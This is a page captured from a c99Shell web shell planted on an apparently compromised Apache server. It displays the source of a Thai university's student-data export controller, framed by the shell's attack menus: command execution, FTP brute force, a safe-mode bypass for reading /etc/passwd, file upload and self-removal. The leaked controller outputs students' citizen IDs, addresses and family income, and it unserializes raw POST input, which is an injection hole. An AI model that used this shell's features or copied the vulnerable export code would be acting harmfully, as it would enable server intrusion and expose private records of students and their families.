!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/controllers/eregis-12022565/   drwxrwxrwx
Free 50.99 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     export.php (21.11 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include('rg_controller.php');
class 
export extends Rg_controller {

    
// start หาปีจบ
    
function curl_graduateY() {
        
$data file_get_contents("php://input");

        
$this->load->model($this->config->item("rg_folder").'mo_rg_student','std');
        
$graduateY $this->std->qryGropGraduateY();

        
$xml_output "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n";
        
$xml_output .= "<entries>\n";
        
$xml_output .= "\t<entry>\n";
        
$xml_output .= "\t\t<name>" .$graduateY->num_rows(). "</name>\n";
        
$xml_output .= "\t</entry>\n";

        if(
$graduateY->num_rows()) {
            foreach(
$graduateY->result() as $row) { 
                
$xml_output .= "\t<entry>\n"
                
$xml_output .= "\t\t<graduateY>".$row->stdGraduateY."</graduateY>\n";
                
$xml_output .= "\t</entry>\n";
            }
        }
        
$xml_output .= "\t<entry>\n"
        
$xml_output .= "\t\t<end>".$graduateY->num_rows()."</end>\n"
        
$xml_output .= "\t</entry>\n"
        
$xml_output .= "</entries>";

        
file_put_contents("php://output"$xml_output);
    }
    
// end หาปีจบ

    // start หา นศ. สำเร็จการศึกษา
    
function curl_StdByGraduateY() {
        
ini_set('memory_limit','2048M');
        
$data file_get_contents("php://input");
        
set_time_limit(0);

        
$this->load->model($this->config->item("rg_folder").'mo_rg_student','std');

        
$con_rs_std = array('stdGraduateY'    => $data,
                            
'stdSstId'        => '4');
        
$rs_std $this->std->qryStdJoinPfCurGen($con_rs_std);

        
$xml_output "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n";
        
$xml_output .= "<entries>\n";
        
$xml_output .= "\t<fEntry>\n";
        
$xml_output .= "\t\t<name>" .$rs_std->num_rows(). "</name>\n";
        
$xml_output .= "\t</fEntry>\n";

        if(
$rs_std->num_rows()) {
            foreach(
$rs_std->result() as $row) {
                
$xml_output .= "\t<entry>\n"
                
$xml_output .= "\t\t<stdId>".$row->stdId."</stdId>\n";
                
$xml_output .= "\t\t<stdCode>".$row->stdCode."</stdCode>\n";
                
$xml_output .= "\t\t<stdName>".$row->stdName."</stdName>\n";
                
$xml_output .= "\t\t<stdNameE>".$row->stdNameE."</stdNameE>\n";
                
$xml_output .= "\t\t<stdSurname>".$row->stdSurname."</stdSurname>\n";
                
$xml_output .= "\t\t<stdSurnameE>".$row->stdSurnameE."</stdSurnameE>\n";
                
$xml_output .= "\t\t<stdCreditAttempt>".$row->stdCreditAttempt."</stdCreditAttempt>\n";
                
$xml_output .= "\t\t<stdCreditSatisfy>".$row->stdCreditSatisfy."</stdCreditSatisfy>\n";
                
$xml_output .= "\t\t<stdGPA>".$row->stdGPA."</stdGPA>\n";
                
$xml_output .= "\t\t<stdAdY>".$row->stdAdY."</stdAdY>\n";
                
$xml_output .= "\t\t<stdAdmitDate>".$row->stdAdmitDate."</stdAdmitDate>\n";
                
$xml_output .= "\t\t<stdGraduateY>".$row->stdGraduateY."</stdGraduateY>\n";
                
$xml_output .= "\t\t<stdGraduateDate>".$row->stdGraduateDate."</stdGraduateDate>\n";
                
$xml_output .= "\t\t<stdTotalPoint>".$row->stdTotalPoint."</stdTotalPoint>\n";
                
$xml_output .= "\t\t<stdExitExam>".$row->stdExitExam."</stdExitExam>\n";
                
$xml_output .= "\t\t<stdHonor>".$row->stdExitExam."</stdHonor>\n";
                
$xml_output .= "\t\t<stdMedal>".$row->stdMedal."</stdMedal>\n";
                
$xml_output .= "\t\t<stdGenStatus>".$row->stdGenStatus."</stdGenStatus>\n";
                
$xml_output .= "\t\t<stdPfId>".$row->stdPfId."</stdPfId>\n";
                
$xml_output .= "\t\t<stdCurId>".$row->stdCurId."</stdCurId>\n";
                
$xml_output .= "\t\t<stdTmIdAdmit>".$row->stdTmIdAdmit."</stdTmIdAdmit>\n";
                
$xml_output .= "\t\t<stdSyId>".$row->stdSyId."</stdSyId>\n";
                
$xml_output .= "\t\t<stdSstId>".$row->stdSstId."</stdSstId>\n";
                
$xml_output .= "\t\t<stdGenId>".$row->stdGenId."</stdGenId>\n";
                
$xml_output .= "\t\t<stdEtId>".$row->stdEtId."</stdEtId>\n";
                
$xml_output .= "\t\t<stdEt2Id>".$row->stdEt2Id."</stdEt2Id>\n";
                
$xml_output .= "\t\t<stdPaId>".$row->stdPaId."</stdPaId>\n";
                
$xml_output .= "\t\t<stdSoId>".$row->stdSoId."</stdSoId>\n";
                
$xml_output .= "\t\t<stdFsId>".$row->stdFsId."</stdFsId>\n";
                
$xml_output .= "\t\t<stdSstIdTmp>".$row->stdSstIdTmp."</stdSstIdTmp>\n";
                
$xml_output .= "\t\t<stdUpdateDate>".$row->stdUpdateDate."</stdUpdateDate>\n";
                
$xml_output .= "\t\t<stdUpdateUsLogin>".$row->stdUpdateUsLogin."</stdUpdateUsLogin>\n";
                
$xml_output .= "\t\t<sdtStdId>".$row->sdtStdId."</sdtStdId>\n";
                
$xml_output .= "\t\t<sdtOldName>".$row->sdtOldName."</sdtOldName>\n";
                
$xml_output .= "\t\t<sdtSex>".$row->sdtSex."</sdtSex>\n";
                
$xml_output .= "\t\t<sdtCitizenId>".$row->sdtCitizenId."</sdtCitizenId>\n";
                
$xml_output .= "\t\t<sdtBirthDate>".$row->sdtBirthDate."</sdtBirthDate>\n";
                
$xml_output .= "\t\t<sdtBloodGroup>".$row->sdtBloodGroup."</sdtBloodGroup>\n";
                
$xml_output .= "\t\t<sdtCardExpireDate>".$row->sdtCardExpireDate."</sdtCardExpireDate>\n";
                
$xml_output .= "\t\t<sdtEmail>".$row->sdtEmail."</sdtEmail>\n";
                
$xml_output .= "\t\t<sdtWeight>".$row->sdtWeight."</sdtWeight>\n";
                
$xml_output .= "\t\t<sdtHeight>".$row->sdtHeight."</sdtHeight>\n";
                
$xml_output .= "\t\t<sdtPicturePath>".$row->sdtPicturePath."</sdtPicturePath>\n";
                
$xml_output .= "\t\t<sdtCanRefund>".$row->sdtCanRefund."</sdtCanRefund>\n";
                
$xml_output .= "\t\t<sdtOccExamResult>".$row->sdtOccExamResult."</sdtOccExamResult>\n";
                
$xml_output .= "\t\t<sdtHomeAddr>".$row->sdtHomeAddr."</sdtHomeAddr>\n";
                
$xml_output .= "\t\t<sdtHomePostCode>".$row->sdtHomePostCode."</sdtHomePostCode>\n";
                
$xml_output .= "\t\t<sdtHomePhoneNo>".$row->sdtHomePhoneNo."</sdtHomePhoneNo>\n";
                
$xml_output .= "\t\t<sdtCurrentAddr>".$row->sdtCurrentAddr."</sdtCurrentAddr>\n";
                
$xml_output .= "\t\t<sdtCurrentPostCode>".$row->sdtCurrentPostCode."</sdtCurrentPostCode>\n";
                
$xml_output .= "\t\t<sdtCurrentPhoneNo>".$row->sdtCurrentPhoneNo."</sdtCurrentPhoneNo>\n";
                
$xml_output .= "\t\t<sdtWorkName>".$row->sdtWorkName."</sdtWorkName>\n";
                
$xml_output .= "\t\t<sdtWorkAddr>".$row->sdtWorkAddr."</sdtWorkAddr>\n";
                
$xml_output .= "\t\t<sdtWorkPostCode>".$row->sdtWorkPostCode."</sdtWorkPostCode>\n";
                
$xml_output .= "\t\t<sdtWorkPhoneNo>".$row->sdtWorkPhoneNo."</sdtWorkPhoneNo>\n";
                
$xml_output .= "\t\t<sdtWorkPosition>".$row->sdtWorkPosition."</sdtWorkPosition>\n";
                
$xml_output .= "\t\t<sdtWorkSalary>".$row->sdtWorkSalary."</sdtWorkSalary>\n";
                
$xml_output .= "\t\t<sdtWorkStatus>".$row->sdtWorkStatus."</sdtWorkStatus>\n";
                
$xml_output .= "\t\t<sdtFatherName>".$row->sdtFatherName."</sdtFatherName>\n";
                
$xml_output .= "\t\t<sdtFatherSurname>".$row->sdtFatherSurname."</sdtFatherSurname>\n";
                
$xml_output .= "\t\t<sdtFatherAddr>".$row->sdtFatherAddr."</sdtFatherAddr>\n";
                
$xml_output .= "\t\t<sdtFatherPostCode>".$row->sdtFatherPostCode."</sdtFatherPostCode>\n";
                
$xml_output .= "\t\t<sdtFatherPhoneNo>".$row->sdtFatherPhoneNo."</sdtFatherPhoneNo>\n";
                
$xml_output .= "\t\t<sdtFatherOccupation>".$row->sdtFatherOccupation."</sdtFatherOccupation>\n";
                
$xml_output .= "\t\t<sdtFatherStatus>".$row->sdtFatherStatus."</sdtFatherStatus>\n";
                
$xml_output .= "\t\t<sdtMotherName>".$row->sdtMotherName."</sdtMotherName>\n";
                
$xml_output .= "\t\t<sdtMotherSurname>".$row->sdtMotherSurname."</sdtMotherSurname>\n";
                
$xml_output .= "\t\t<sdtMotherAddr>".$row->sdtMotherAddr."</sdtMotherAddr>\n";
                
$xml_output .= "\t\t<sdtMotherPostCode>".$row->sdtMotherPostCode."</sdtMotherPostCode>\n";
                
$xml_output .= "\t\t<sdtMotherPhoneNo>".$row->sdtMotherPhoneNo."</sdtMotherPhoneNo>\n";
                
$xml_output .= "\t\t<sdtMotherOccupation>".$row->sdtMotherOccupation."</sdtMotherOccupation>\n";
                
$xml_output .= "\t\t<sdtMotherStatus>".$row->sdtMotherStatus."</sdtMotherStatus>\n";
                
$xml_output .= "\t\t<sdtParentName>".$row->sdtParentName."</sdtParentName>\n";
                
$xml_output .= "\t\t<sdtParentSurname>".$row->sdtParentSurname."</sdtParentSurname>\n";
                
$xml_output .= "\t\t<sdtParentRelationship>".$row->sdtParentRelationship."</sdtParentRelationship>\n";
                
$xml_output .= "\t\t<sdtParentAddr>".$row->sdtParentAddr."</sdtParentAddr>\n";
                
$xml_output .= "\t\t<sdtParentPostCode>".$row->sdtParentPostCode."</sdtParentPostCode>\n";
                
$xml_output .= "\t\t<sdtParentPhoneNo>".$row->sdtParentPhoneNo."</sdtParentPhoneNo>\n";
                
$xml_output .= "\t\t<sdtParentMobileNo>".$row->sdtParentMobileNo."</sdtParentMobileNo>\n";
                
$xml_output .= "\t\t<sdtParentEmail>".$row->sdtParentEmail."</sdtParentEmail>\n";
                
$xml_output .= "\t\t<sdtParentOccupation>".$row->sdtParentOccupation."</sdtParentOccupation>\n";
                
$xml_output .= "\t\t<sdtParentIncome>".$row->sdtParentIncome."</sdtParentIncome>\n";
                
$xml_output .= "\t\t<sdtContactName>".$row->sdtContactName."</sdtContactName>\n";
                
$xml_output .= "\t\t<sdtContactAddr>".$row->sdtContactAddr."</sdtContactAddr>\n";
                
$xml_output .= "\t\t<sdtContactPostCode>".$row->sdtContactPostCode."</sdtContactPostCode>\n";
                
$xml_output .= "\t\t<sdtContactPhoneNo>".$row->sdtContactPhoneNo."</sdtContactPhoneNo>\n";
                
$xml_output .= "\t\t<sdtGraduateAddr>".$row->sdtGraduateAddr."</sdtGraduateAddr>\n";
                
$xml_output .= "\t\t<sdtGraduatePostCode>".$row->sdtGraduatePostCode."</sdtGraduatePostCode>\n";
                
$xml_output .= "\t\t<sdtGraduatePhoneNo>".$row->sdtGraduatePhoneNo."</sdtGraduatePhoneNo>\n";
                
$xml_output .= "\t\t<sdtPrvIdBirth>".$row->sdtPrvIdBirth."</sdtPrvIdBirth>\n";
                
$xml_output .= "\t\t<sdtCntId>".$row->sdtCntId."</sdtCntId>\n";
                
$xml_output .= "\t\t<sdtNtId>".$row->sdtNtId."</sdtNtId>\n";
                
$xml_output .= "\t\t<sdtRlgId>".$row->sdtRlgId."</sdtRlgId>\n";
                
$xml_output .= "\t\t<sdtMsId>".$row->sdtMsId."</sdtMsId>\n";
                
$xml_output .= "\t\t<sdtRtId>".$row->sdtRtId."</sdtRtId>\n";
                
$xml_output .= "\t\t<sdtHpId>".$row->sdtHpId."</sdtHpId>\n";
                
$xml_output .= "\t\t<sdtPfIdParent>".$row->sdtPfIdParent."</sdtPfIdParent>\n";
                
$xml_output .= "\t\t<sdtDtIdHome>".$row->sdtDtIdHome."</sdtDtIdHome>\n";
                
$xml_output .= "\t\t<sdtApIdHome>".$row->sdtApIdHome."</sdtApIdHome>\n";
                
$xml_output .= "\t\t<sdtPrvIdHome>".$row->sdtPrvIdHome."</sdtPrvIdHome>\n";
                
$xml_output .= "\t\t<sdtDtIdCurrent>".$row->sdtDtIdCurrent."</sdtDtIdCurrent>\n";
                
$xml_output .= "\t\t<sdtApIdCurrent>".$row->sdtApIdCurrent."</sdtApIdCurrent>\n";
                
$xml_output .= "\t\t<sdtPrvIdCurrent>".$row->sdtPrvIdCurrent."</sdtPrvIdCurrent>\n";
                
$xml_output .= "\t\t<sdtDtIdWork>".$row->sdtDtIdWork."</sdtDtIdWork>\n";
                
$xml_output .= "\t\t<sdtApIdWork>".$row->sdtApIdWork."</sdtApIdWork>\n";
                
$xml_output .= "\t\t<sdtPrvIdWork>".$row->sdtPrvIdWork."</sdtPrvIdWork>\n";
                
$xml_output .= "\t\t<sdtDtIdFather>".$row->sdtDtIdFather."</sdtDtIdFather>\n";
                
$xml_output .= "\t\t<sdtApIdFather>".$row->sdtApIdFather."</sdtApIdFather>\n";
                
$xml_output .= "\t\t<sdtPrvIdFather>".$row->sdtPrvIdFather."</sdtPrvIdFather>\n";
                
$xml_output .= "\t\t<sdtDtIdMother>".$row->sdtDtIdMother."</sdtDtIdMother>\n";
                
$xml_output .= "\t\t<sdtApIdMother>".$row->sdtApIdMother."</sdtApIdMother>\n";
                
$xml_output .= "\t\t<sdtPrvIdMother>".$row->sdtPrvIdMother."</sdtPrvIdMother>\n";
                
$xml_output .= "\t\t<sdtDtIdParent>".$row->sdtDtIdParent."</sdtDtIdParent>\n";
                
$xml_output .= "\t\t<sdtApIdParent>".$row->sdtApIdParent."</sdtApIdParent>\n";
                
$xml_output .= "\t\t<sdtPrvIdParent>".$row->sdtPrvIdParent."</sdtPrvIdParent>\n";
                
$xml_output .= "\t\t<sdtDtIdContact>".$row->sdtDtIdContact."</sdtDtIdContact>\n";
                
$xml_output .= "\t\t<sdtApIdContact>".$row->sdtApIdContact."</sdtApIdContact>\n";
                
$xml_output .= "\t\t<sdtPrvIdContact>".$row->sdtPrvIdContact."</sdtPrvIdContact>\n";
                
$xml_output .= "\t\t<sdtDtIdGraduate>".$row->sdtDtIdGraduate."</sdtDtIdGraduate>\n";
                
$xml_output .= "\t\t<sdtApIdGraduate>".$row->sdtApIdGraduate."</sdtApIdGraduate>\n";
                
$xml_output .= "\t\t<sdtPrvIdGraduate>".$row->sdtPrvIdGraduate."</sdtPrvIdGraduate>\n";
                
$xml_output .= "\t\t<sdtEdgIdPre>".$row->sdtEdgIdPre."</sdtEdgIdPre>\n";
                
$xml_output .= "\t\t<curElvId>".$row->curElvId."</curElvId>\n";
                
$xml_output .= "\t\t<defaultSex>".$row->defaultSex."</defaultSex>\n";
                
$xml_output .= "\t</entry>\n";
            }
        }

        
$xml_output .= "\t<lEntry>\n"
        
$xml_output .= "\t\t<end>".$rs_std->num_rows()."</end>\n"
        
$xml_output .= "\t</lEntry>\n"
        
$xml_output .= "</entries>";

        
file_put_contents("php://output"$xml_output);
    }
    
// end หา นศ. สำเร็จการศึกษา

    // start หารุ่น นศ.
    
function curl_generation() {
        
ini_set('memory_limit','2048M');
        
$data file_get_contents("php://input");
        
set_time_limit(0);

        
$this->load->model($this->config->item("rg_folder").'mo_rg_generation','gen');

        
$rs_gen $this->gen->qryGen();

        
$xml_output "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n";
        
$xml_output .= "<entries>\n";
        
$xml_output .= "\t<entry>\n";
        
$xml_output .= "\t\t<name>" .$rs_gen->num_rows(). "</name>\n";
        
$xml_output .= "\t</entry>\n";

        if(
$rs_gen->num_rows()) {
            foreach(
$rs_gen->result() as $row) { 
                
$xml_output .= "\t<entry>\n"
                
$xml_output .= "\t\t<genId>".$row->genId."</genId>\n";
                
$xml_output .= "\t\t<genAcY>".$row->genAcY."</genAcY>\n";
                
$xml_output .= "\t\t<genNo>".$row->genNo."</genNo>\n";
                
$xml_output .= "\t\t<genCurId>".$row->genCurId."</genCurId>\n";
                
$xml_output .= "\t\t<genTmId>".$row->genTmId."</genTmId>\n";
                
$xml_output .= "\t</entry>\n";
            }
        }
        
$xml_output .= "\t<entry>\n"
        
$xml_output .= "\t\t<end>".$rs_gen->num_rows()."</end>\n"
        
$xml_output .= "\t</entry>\n"
        
$xml_output .= "</entries>";

        
file_put_contents("php://output"$xml_output);
    }
    
// end หารุ่น นศ.

    // start หลักสูตร + ระดับการศึกษา
    
function curl_curriculum() {
        
ini_set('memory_limit','2048M');
        
$data file_get_contents("php://input");
        
set_time_limit(0);

        
$this->load->model($this->config->item("rg_folder").'mo_rg_curriculum','cur');

        
$rs_cur $this->cur->qryCurJoinEdgElv();

        
$xml_output "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n";
        
$xml_output .= "<entries>\n";
        
$xml_output .= "\t<entry>\n";
        
$xml_output .= "\t\t<name>" .$rs_cur->num_rows(). "</name>\n";
        
$xml_output .= "\t</entry>\n";

        if(
$rs_cur->num_rows()) {
            foreach(
$rs_cur->result() as $row) { 
                
$xml_output .= "\t<entry>\n"
                
$xml_output .= "\t\t<curId>".$row->curId."</curId>\n";
                
$xml_output .= "\t\t<curImproveY>".$row->curImproveY."</curImproveY>\n";
                
$xml_output .= "\t\t<curName>".$row->curName."</curName>\n";
                
$xml_output .= "\t\t<curNameE>".$row->curNameE."</curNameE>\n";
                
$xml_output .= "\t\t<curAbbr>".$row->curAbbr."</curAbbr>\n";
                
$xml_output .= "\t\t<curAbbrE>".$row->curAbbrE."</curAbbrE>\n";
                
$xml_output .= "\t\t<curStatus>".$row->curStatus."</curStatus>\n";
                
$xml_output .= "\t\t<curCcId>".$row->curCcId."</curCcId>\n";
                
$xml_output .= "\t\t<ccCode>".$row->ccCode."</ccCode>\n";
                
$xml_output .= "\t\t<ccName>".$row->ccName."</ccName>\n";
                
$xml_output .= "\t\t<curEdgId>".$row->curEdgId."</curEdgId>\n";
                
$xml_output .= "\t\t<edgName>".$row->edgName."</edgName>\n";
                
$xml_output .= "\t\t<edgNameE>".$row->edgNameE."</edgNameE>\n";
                
$xml_output .= "\t\t<edgAbbr>".$row->edgAbbr."</edgAbbr>\n";
                
$xml_output .= "\t\t<edgAbbrE>".$row->edgAbbrE."</edgAbbrE>\n";
                
$xml_output .= "\t\t<curElvId>".$row->curElvId."</curElvId>\n";
                
$xml_output .= "\t\t<levelName>".$row->levelName."</levelName>\n";
                
$xml_output .= "\t\t<levelNameEng>".$row->levelNameEng."</levelNameEng>\n";
                
$xml_output .= "\t\t<levelAbbr>".$row->levelAbbr."</levelAbbr>\n";
                
$xml_output .= "\t\t<levelAbbrEng>".$row->levelAbbrEng."</levelAbbrEng>\n";
                
$xml_output .= "\t</entry>\n";
            }
        }

        
$xml_output .= "\t<entry>\n"
        
$xml_output .= "\t\t<end>".$rs_cur->num_rows()."</end>\n"
        
$xml_output .= "\t</entry>\n"
        
$xml_output .= "</entries>";

        
file_put_contents("php://output"$xml_output);
    }
    
// end หลักสูตร + ระดับการศึกษา

    // start หาประเภทบัณฑิต
    
function curl_CurriculumConfig() {
        
ini_set('memory_limit','2048M');
        
$data file_get_contents("php://input");
        
set_time_limit(0);

        
$this->load->model($this->config->item("rg_folder").'mo_rg_curriculumconfig','cc');

        
$rs_cc $this->cc->qryCc();

        
$xml_output "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n";
        
$xml_output .= "<entries>\n";
        
$xml_output .= "\t<entry>\n";
        
$xml_output .= "\t\t<name>" .$rs_cc->num_rows(). "</name>\n";
        
$xml_output .= "\t</entry>\n";

        if(
$rs_cc->num_rows()) {
            foreach(
$rs_cc->result() as $row) { 
                
$xml_output .= "\t<entry>\n"
                
$xml_output .= "\t\t<ccId>".$row->ccId."</ccId>\n";
                
$xml_output .= "\t\t<ccCode>".$row->ccCode."</ccCode>\n";
                
$xml_output .= "\t\t<ccName>".$row->ccName."</ccName>\n";
                
$xml_output .= "\t\t<ccStatus>".$row->ccStatus."</ccStatus>\n";
                
$xml_output .= "\t</entry>\n";
            }
        }

        
$xml_output .= "\t<entry>\n"
        
$xml_output .= "\t\t<end>".$rs_cc->num_rows()."</end>\n"
        
$xml_output .= "\t</entry>\n"
        
$xml_output .= "</entries>";

        
file_put_contents("php://output"$xml_output);
    }
    
// end หาประเภทบัณฑิต

    // start หาวุฒิการศึกษา
    
function curl_EduDegree() {
        
ini_set('memory_limit','2048M');
        
$data file_get_contents("php://input");
        
set_time_limit(0);

        
$this->load->model($this->config->item("rg_folder").'mo_rg_edudegree','edg');

        
$rs_edg $this->edg->qryEdg();

        
$xml_output "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n";
        
$xml_output .= "<entries>\n";
        
$xml_output .= "\t<entry>\n";
        
$xml_output .= "\t\t<name>" .$rs_edg->num_rows(). "</name>\n";
        
$xml_output .= "\t</entry>\n";

        if(
$rs_edg->num_rows()) {
            foreach(
$rs_edg->result() as $row) { 
                
$xml_output .= "\t<entry>\n"
                
$xml_output .= "\t\t<edgId>".$row->edgId."</edgId>\n";
                
$xml_output .= "\t\t<edgName>".$row->edgName."</edgName>\n";
                
$xml_output .= "\t\t<edgNameE>".$row->edgNameE."</edgNameE>\n";
                
$xml_output .= "\t\t<edgAbbr>".$row->edgAbbr."</edgAbbr>\n";
                
$xml_output .= "\t\t<edgAbbrE>".$row->edgAbbrE."</edgAbbrE>\n";
                
$xml_output .= "\t</entry>\n";
            }
        }

        
$xml_output .= "\t<entry>\n"
        
$xml_output .= "\t\t<end>".$rs_edg->num_rows()."</end>\n"
        
$xml_output .= "\t</entry>\n"
        
$xml_output .= "</entries>";

        
file_put_contents("php://output"$xml_output);
    }    
// end หาวุฒิการศึกษา

    /* 
    *     13/6/2556
    *     รอบที่หนึ่ง (flag=1) หารายชื่อของอาจารย์ทั้งหมดในระบบ
    *     รอบที่สอง (flag=2) หารายวิชาที่สอนย้อนหลัง 3 ปีรายภาคการศึกษาของอาจารย์ตามรหัสที่ส่งมา
    *     ผู้ร้องขอ ระบบจัดการฐานข้อมูลนักวิจัย
    *     INPUT     :     รอบที่หนึ่ง : ไม่มี 
    *                รอบที่สอง : รหัสอาจารย์ $ps_id (ตรงกับ rg_Person.prsId),และใช้วันที่ปัจจุบันในการหาปีการศึกษาปัจจุบัน
    *     OUTPUT     :     รอบที่หนึ่ง : personId, prefixName, Name
    *                รอบที่สอง : ttPrsId, coAcY, coTmId, crsCode, crsName
    *
    *    UPDATE : 2013-06-19 BY meuzicxx
    */
    
function curl_RegTeach() {
        
ini_set('memory_limit','2048M');
        
set_time_limit(0);
        
        
$arr unserialize($this->input->post('arr'));
        
$flag $arr['flag'];
        
        if(
$flag == 1){
            
$this->load->model($this->config->item("rg_folder").'mo_rg_person','rps');
            
            
$xml_output "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n";
            
$xml_output .= "<entries>\n";
            
$rs_ps $this->rps->getAllPsJoinPeople();
            if(
$rs_ps->num_rows() > 0){
                foreach (
$rs_ps->result() as $row_ps) {
                    
$xml_output .= "\t<entry>\n";
                    
$xml_output .= "\t\t<personId>".$row_ps->prsId."</personId>\n";
                    
$xml_output .= "\t\t<prefixName>".$row_ps->prefixName."</prefixName>\n";
                    
$xml_output .= "\t\t<Name>".$row_ps->name."</Name>\n";
                    
$xml_output .= "\t</entry>\n";
                }
            }
            
$xml_output .= "</entries>\n";
        }
        else{
            
$ps_id $arr['ps_id'];
            
            
$this->load->model($this->config->item("rg_folder").'mo_rg_termconfig','tcf');
            
$this->load->model($this->config->item("rg_folder").'mo_rg_timetable','ttb');

            
$rs_tcf $this->tcf->get_tmcAcY();
            
$tmcAcY $rs_tcf->row()->tmcAcY;
            
            
$xml_output "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n";
            
$xml_output .= "<entries>\n";
            
            
$rs_ttb $this->ttb->getTTByTmcAcYAndPrsId($tmcAcY$ps_id);
            if(
$rs_ttb->num_rows() > 0) {
                foreach(
$rs_ttb->result() as $row) { 
                    
$xml_output .= "\t<entry>\n"
                    
$xml_output .= "\t\t<tch_ps_id>".$row->ttPrsId."</tch_ps_id>\n";
                    
$xml_output .= "\t\t<tch_year>".$row->coAcY."</tch_year>\n";
                    
$xml_output .= "\t\t<tch_term>".$row->coTmId."</tch_term>\n";
                    
$xml_output .= "\t\t<tch_course_no>".$row->crsCode."</tch_course_no>\n";
                    
$xml_output .= "\t\t<tch_course_name>".$row->crsName ."</tch_course_name >\n";
                    
$xml_output .= "\t</entry>\n";
                }
            }
            
$xml_output .= "</entries>";
        }
        
        
file_put_contents("php://output"$xml_output);
        
    }    
// END curl_RegTeach FUNCTION
    
    
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0163 ]--